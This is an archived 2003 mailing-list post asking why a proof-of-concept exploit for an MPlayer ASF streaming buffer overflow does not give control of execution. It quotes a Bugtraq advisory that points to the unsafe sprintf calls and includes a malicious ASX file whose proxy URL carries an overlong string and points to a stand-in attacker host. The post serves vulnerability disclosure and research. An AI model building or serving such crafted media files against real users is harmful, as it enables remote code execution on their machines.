Vulnerability Development mailing list archives
MPlayer buffer overflow
From: Peter Geissler <blasty () geekz nl>
Date: Mon, 29 Sep 2003 21:47:44 +0200
In-Reply-To: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8 () USPLM250 txpln us eds com>
I tried to exploit this bug, But I didn't succeed. The only thing happens is mplayer crashes, so I did a hookup with GDB, and saw it crashed on strcasecmp with eip 0x40315fe0 and not something like 0x41414141 ;) In the PoC exploit on bugtraq the "aaaa..." buffer is not correctly formatted (newlines must be removed so it's one long string..), but I already fixed that. Has anyone an idea what I'm doing wrong?
>Received: (qmail 27128 invoked from network); 26 Sep 2003 19:54:43 -0000 >Received: from outgoing3.securityfocus.com (205.206.231.27) > by mail.securityfocus.com with SMTP; 26 Sep 2003 19:54:43 -0000 >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) > by outgoing3.securityfocus.com (Postfix) with QMQP > id 29059A3563; Fri, 26 Sep 2003 11:15:06 -0600 (MDT) >Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq () securityfocus com> >List-Help: <mailto:bugtraq-help () securityfocus com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> >List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> >Delivered-To: mailing list bugtraq () securityfocus com >Delivered-To: moderator for bugtraq () securityfocus com >Received: (qmail 1413 invoked from network); 25 Sep 2003 18:13:00 -0000 >Message-ID: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8 () USPLM250 txpln us eds com> >From: "Otero, Hernan" <hernan.otero () eds com> >To: "'bugtraq () securityfocus com'" <bugtraq () securityfocus com> >Subject: Mplayer Buffer Overflow >Date: Thu, 25 Sep 2003 19:17:49 -0500 >MIME-Version: 1.0 >X-Mailer: Internet Mail Service (5.5.2656.59) >Content-Type: text/plain; > charset="ISO-8859-1" >Content-Transfer-Encoding: quoted-printable > > >Favorite Linux Player Buffer Overflow > > > Product: Mplayer > Developers: http://www.mplayerhq.hu > OS: Port to All *NIX and Win32 > Remote Exploitable: YES >>Developers has been contacted, problem was fixed, recomended update >your>mplayer version. >> In the source tree there is a file called asf_streaming.c this file >has a >function named asf_http_request, that function has two buffer >overflows,>this overflows are in the sprintf lines. > > > asf_http_request { > char str[250]; > .... > ... > .. > sprintf( str, "Host: %s:%d", server_url->hostname,> server_url->port ); > ....> ... > .. > sprintf( str, "Host: %s:%d", url->hostname, url->port ); > > .... > ... > .. > } > > >> This, at a first look, may look as it can=B4t be exploited ( because >the>MAXHOSTLEN size restriction )... but if in an ASX file like this with a>"badsite" listening in "badport" send "\n\n" as answer you could lead >to a>fully controllable EIP buffer overflow > > > <asx version =3D "3.0"> > <title>Bas Site ASX</title> > > <moreinfo href =3D "mailto:info () badsite com > <mailto:info () badsite com> " /> > <logo href =3D "http://www.badsite.com/streaming/grupo.gif > <http://www.badsite.com/streaming/grupo.gif> " style=3D"ICON" /> > <banner href=3D "images/bannermitre.gif"> > <abstract>Bad Site live</abstract> > <moreinfo target=3D"_blank" href =3D "http://www.badsite.com/ > <http://www.badsite.com/> " /> > </banner> > > <entry> > <title>NEWS</title> > <AUTHOR>NEWS</AUTHOR> > <COPYRIGHT>=A9 All by the news</COPYRIGHT>> <ref href >"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=>aaaa >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= >aaaa >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= >aaaa >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= >aaaa >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa= >aaaa >aaaaaaaaaaaa"/> > <logo href =3D "http://www.badsite.com/streaming/grupo.gif > <http://badsite.com/streaming/grupo.gif> " style=3D"ICON" /> > </entry> > </asx> > > > > Regards, > > Hern=E1n Otero > hernan.otero () eds com
Current thread:
- MPlayer buffer overflow Peter Geissler (Sep 29)
